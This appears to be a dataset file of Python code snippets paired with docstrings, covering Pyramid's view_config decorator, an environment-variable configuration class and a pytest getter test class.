class view_config(object): <NEW_LINE> <INDENT> venusian = venusian <NEW_LINE> def __init__(self, name='', request_type=None, for_=None, permission=None, route_name=None, request_method=None, request_param=None, containment=None, attr=None, renderer=None, wrapper=None, xhr=False, accept=None, header=None, path_info=None, custom_predicates=(), context=None, decorator=None, mapper=None): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self.request_type = request_type <NEW_LINE> self.context = context or for_ <NEW_LINE> self.permission = permission <NEW_LINE> self.route_name = route_name <NEW_LINE> self.request_method = request_method <NEW_LINE> self.request_param = request_param <NEW_LINE> self.containment = containment <NEW_LINE> self.attr = attr <NEW_LINE> self.renderer = renderer <NEW_LINE> self.wrapper = wrapper <NEW_LINE> self.xhr = xhr <NEW_LINE> self.accept = accept <NEW_LINE> self.header = header <NEW_LINE> self.path_info = path_info <NEW_LINE> self.custom_predicates = custom_predicates <NEW_LINE> self.decorator = decorator <NEW_LINE> self.mapper = mapper <NEW_LINE> <DEDENT> def __call__(self, wrapped): <NEW_LINE> <INDENT> settings = self.__dict__.copy() <NEW_LINE> def callback(context, name, ob): <NEW_LINE> <INDENT> renderer = settings.get('renderer') <NEW_LINE> if isinstance(renderer, basestring): <NEW_LINE> <INDENT> renderer = RendererHelper(name=renderer, package=info.module, registry=context.config.registry) <NEW_LINE> <DEDENT> settings['renderer'] = renderer <NEW_LINE> context.config.add_view(view=ob, **settings) <NEW_LINE> <DEDENT> info = self.venusian.attach(wrapped, callback, category='pyramid') <NEW_LINE> if info.scope == 'class': <NEW_LINE> <INDENT> if settings['attr'] is None: <NEW_LINE> <INDENT> settings['attr'] = wrapped.__name__ <NEW_LINE> <DEDENT> <DEDENT> settings['_info'] = info.codeinfo <NEW_LINE> return wrapped | A function, class or method :term:`decorator` which allows a
developer to create view registrations nearer to a :term:`view
callable` definition than use :term:`imperative
configuration` to do the same.
For example, this code in a module ``views.py``::
from resources import MyResource
@view_config(name='my_view', context=MyResource, permission='read',
route_name='site1')
def my_view(context, request):
return 'OK'
Might replace the following call to the
:meth:`pyramid.config.Configurator.add_view` method::
import views
from resources import MyResource
config.add_view(views.my_view, context=MyResource, name='my_view',
permission='read', route_name='site1')
.. note:: :class:`pyramid.view.view_config` is also importable, for
backwards compatibility purposes, as the name
:class:`pyramid.view.bfg_view`.
The following arguments are supported as arguments to
:class:`pyramid.view.view_config`: ``context``, ``permission``, ``name``,
``request_type``, ``route_name``, ``request_method``, ``request_param``,
``containment``, ``xhr``, ``accept``, ``header``, ``path_info``,
``custom_predicates``, ``decorator``, and ``mapper``.
The meanings of these arguments are the same as the arguments passed to
:meth:`pyramid.config.Configurator.add_view`.
See :ref:`mapping_views_using_a_decorator_section` for details about
using :class:`view_config`. | 62599087ec188e330fdfa44f |
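The `info.scope == 'class'` branch in `__call__` is what makes method-level decoration work: when the decorator is applied inside a class, `attr` defaults to the method name. A hedged sketch of that pattern (route name and renderer are illustrative):

    from pyramid.view import view_config

    class MyViews(object):
        def __init__(self, request):
            self.request = request

        # Registered roughly as config.add_view(MyViews, attr='hello',
        # route_name='hello', renderer='json') once config.scan() runs.
        @view_config(route_name='hello', renderer='json')
        def hello(self):
            return {'msg': 'OK'}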
class UserConfig(dict): <NEW_LINE> <INDENT> def init(self): <NEW_LINE> <INDENT> envs = { k.split("DIRECTOR_")[1]: v for k, v in os.environ.items() if k.startswith("DIRECTOR_") and k not in HIDDEN_CONFIG } <NEW_LINE> super().__init__(**envs) <NEW_LINE> <DEDENT> def __getattr__(self, attr): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self[attr] <NEW_LINE> <DEDENT> except KeyError as e: <NEW_LINE> <INDENT> raise AttributeError(f"Config '{e.args[0]}' not defined") | Handle the user configuration | 62599087be7bc26dc9252c27 |
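A hedged usage sketch, assuming `UserConfig` (and the `HIDDEN_CONFIG` set it references) is importable from the project: only `DIRECTOR_`-prefixed environment variables are collected, the prefix is stripped, and values become attribute-readable.

    import os

    os.environ["DIRECTOR_HOME"] = "/opt/director"    # hypothetical setting
    config = UserConfig()
    config.init()
    print(config.HOME)                               # /opt/director
    try:
        config.DATABASE_URI                          # never set above
    except AttributeError as exc:
        print(exc)                                   # Config 'DATABASE_URI' not defined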
@pytest.mark.usefixtures("set_device_parameters") <NEW_LINE> class TestGetter(BaseTestGetters): <NEW_LINE> <INDENT> def test_method_signatures(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> super(TestGetter, self).test_method_signatures() <NEW_LINE> <DEDENT> except AssertionError: <NEW_LINE> <INDENT> pass | Test get_* methods. | 625990877cff6e4e811b75e5 |